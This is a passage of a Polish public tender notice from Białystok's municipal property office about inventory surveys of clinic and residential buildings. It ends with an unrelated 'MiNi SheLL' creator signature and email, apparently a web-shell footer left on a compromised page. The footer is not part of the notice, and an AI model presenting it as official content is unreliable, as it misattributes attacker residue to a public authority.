oraz spełnieniem przez nowego Podwykonawcę takich samych warunków jak Podwykonawca pierwotny.
3. Warunkiem dokonania zmiany, o której mowa w ust. 2, jest zgoda na jej dokonanie wyrażona przez obie strony oraz złożenie uzasadnionego wniosku przez stronę inicjującą zmianę lub sporządzenie
przez strony stosownego protokołu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> zmk.bip.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, pokój 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.02.2016 godzina 10:00, miejsce: Zarząd Mienia Komunalnego, ul. gen. J. Bema 89/1, 15-370 Białystok, sekretariat, pokój 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1
Opracowanie dokumentacji -   inwentaryzacji technicznej budynków przychodni przy ul. Bema 2, Białówny 11, Mieszka I 8c, Dobra 6, Al. Piłsudskiego 4A, Sienkiewicza 53/1, Sienkiewicza 53B  
w Białymstoku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1
1.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Bema 2 	(przychodnia) w Białymstoku na działce 845/8 obręb 11. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 3665,59 m2. 
2.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Białówny 11 	(przychodnia) w Białymstoku na działce nr 1321/2 obręb 11. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 2543 m2. 
3.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Mieszka I 8C 	(przychodnia) w Białymstoku na działce nr 1095/129 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1483,91 m2. 
4.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Dobra 6 	(przychodnia) w Białymstoku na działce nr 1338/2 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 264,74 m2 +104,70 m2 (apteka). 
5.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy   Al. Piłsudskiego 	4A (przychodnia) w Białymstoku na działce nr 1254/5 obręb 11. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1285 m2.  
6.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Sienkiewicza 	53/1 (przychodnia) w Białymstoku na działce 189/2 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1121,86 m2. 
7.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Sienkiewicza 	53B (przychodnia) w Białymstoku na działce nr 182 obręb 17. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 796,10 m2. 
Szczegółowy opis przedmiotu zamówienia  został podany w  załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 180.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Kryterium - okres rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2
Opracowanie dokumentacji - inwentaryzacji technicznej budynków przychodni  przy ul. Berlinga 8, Radzymińskiej 16, Storczykowej 5, Storczykowej 7, Swobodnej 24, Siewnej 2, Witosa 36, Witosa 38  w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 2
1.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Berlinga 8  	(przychodnia) w Białymstoku na działce 771/3 obręb 2. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 2622,30 m2. 
2.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Radzymińska 	16 (przychodnia) w Białymstoku na działce nr 573/1 obręb 12. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 2565,10m2. 
3.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Storczykowa 5 	(przychodnia) w Białymstoku na działce nr 3155/2 obręb 6. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1950,71 m2. 
4.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Storczykowa 7 	(przychodnia) w Białymstoku na działce nr 3155/2  obręb 6. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 615,51 m2.                   
5.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Swobodnej 24 	(przychodnia) w Białymstoku na działce nr 1754/4 obręb 2. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1527 m2.  
6.	Opracowanie dokumentacji - inwentaryzacji technicznej  budynku położonego przy ul. Siewna 2 	(przychodnia) w Białymstoku na działce 1096/5 obręb 16. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1424,39    m2. 
7.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Witosa 36 	(przychodnia) w Białymstoku na działce nr 657/36 obręb 4. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 1876,98 m2. 
8.	Opracowanie dokumentacji - inwentaryzacji technicznej budynku położonego przy ul. Witosa 38 	(przychodnia) w Białymstoku na działce nr 657/36 obręb 4. Powierzchnia użytkowa budynku 
	wg. dotychczasowych danych: 592,72 m2.
Szczegółowy opis przedmiotu zamówienia został podany w  załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 180.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Kryterium - okres rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3
Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatu inwentaryzacyjnego powierzchni użytkowej budynków przy ul. Przędzalnianej 4A, Sienkiewicza 7A w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3
1.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Przędzalnianej 4A w Białymstoku na działce 
nr 327/5 obręb 1. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 1719 m2.                                       Ilość lokali mieszkalnych - 39
2.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Sienkiewicza 7A w Białymstoku na działce 
nr 1410 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 790,90 m2.                               Ilość lokali mieszkalnych - 18.
Szczegółowy opis przedmiotu zamówienia  został podany w  załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 65.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Kryterium - okres rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4
Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynków przy ul. Piłsudskiego 8, 12,  Lipowej 12, Skłodowskiej 7, Sienkiewicza 6, Nowy Świat 8, Grochowej 2, Waryńskiego 4, Proletariackiej 1 w Białymstoku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 4
1.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy Al. Piłsudskiego 8 w Białymstoku na działce nr 1261 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3059,93 m2. Ilość lokali mieszkalnych - 67 + 2 lokale użytkowe + 6 lokali zaadaptowanych.
2.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy Al. Piłsudskiego 12 w Białymstoku na działce nr 1278 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3.162,93 m2. Ilość lokali mieszkalnych - 65 + 4 lokale zaadaptowane.
3.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Lipowej 12 w Białymstoku na działce nr 1320 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3052,17 m2. Ilość lokali mieszkalnych - 51 + 4 lokale użytkowe.
4.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Skłodowskiej 7 w Białymstoku na działce nr 1816 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 2962,22 m2. Ilość lokali mieszkalnych - 62 + 1 lokal użytkowy.
5.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Sienkiewicza 6 w Białymstoku na działce nr 1477 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 2299,68 m2. Ilość lokali mieszkalnych - 37 + 6 lokali użytkowych.
6.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Nowy Świat 8 w Białymstoku na działce nr 1325 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych:  1303,36 m2. Ilość lokali mieszkalnych - 24.
7.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Grochowej 2 w Białymstoku na działce nr 1590/5 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 3.039,37 m2. Ilość lokali mieszkalnych - 51 + 4 lokale zaadaptowane, 9 lokali użytkowych.
8.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Waryńskiego 4 w Białymstoku na działce nr 1300/4 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 906,22 m2. Ilość lokali mieszkalnych - 11 + 2 lokale użytkowe.
9.	Opracowanie dokumentacji - operatu inwentaryzacyjnego powierzchni użytkowej budynku położonego przy ul. Proletariackiej 1 w Białymstoku na działce nr 120 obręb 11. Powierzchnia użytkowa budynku wg. dotychczasowych danych: 1.693 m2. Ilość lokali mieszkalnych - 41+ 2 lokale zaadaptowane + 1 lokal użytkowy (adaptacja).
Szczegółowy opis przedmiotu zamówienia  został podany w  załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 120.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Kryterium - okres rękojmi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie nr 5
Poprawa operatów inwentaryzacyjnych powierzchni użytkowej budynków przy  
ul. Wołodyjowskiego 2/2, Nowy Świat 14, Tuwima 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 5
1.	Poprawienie projektu inwentaryzacji budowlanej budynku przy ul. Wołodyjowskiego 2/2 - pomiar kondygnacji piwnicznej z natury, wykonanie rzutu kondygnacji piwnicznej, wyliczenie udziałów 
w nieruchomości wspólnej z pomieszczeniami przynależnymi i bez pomieszczeń przynależnych. Powierzchnia użytkowa budynku : 1244,59 m2. Ilość lokali mieszkalnych - 27.
2.	 Wyliczenie udziałów we współwłasności nieruchomości wspólnej przy ul. Nowy Świat 14 
w Białymstoku na działce nr 1328 obręb 11 na podstawie posiadanej dokumentacji budynku (zwymiarowane  lokale i pomieszczenia  przynależne). Powierzchnia użytkowa budynku 1.076,20 m2. Ilość lokali mieszkalnych - 18 + 1 lokal użytkowy.
3.	Wyliczenie udziałów we współwłasności nieruchomości wspólnej przy ul. Tuwima 13  w Białymstoku na działce nr 395 obręb 3 na podstawie posiadanej dokumentacji budynku (zwymiarowane  lokale 
i pomieszczenia  przynależne). Powierzchnia użytkowa budynku: 2131,90 m2 Ilość lokali mieszkalnych - 48.

Szczegółowy opis przedmiotu zamówienia został podany w  załączniku nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Kryterium - okres rękojmi - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com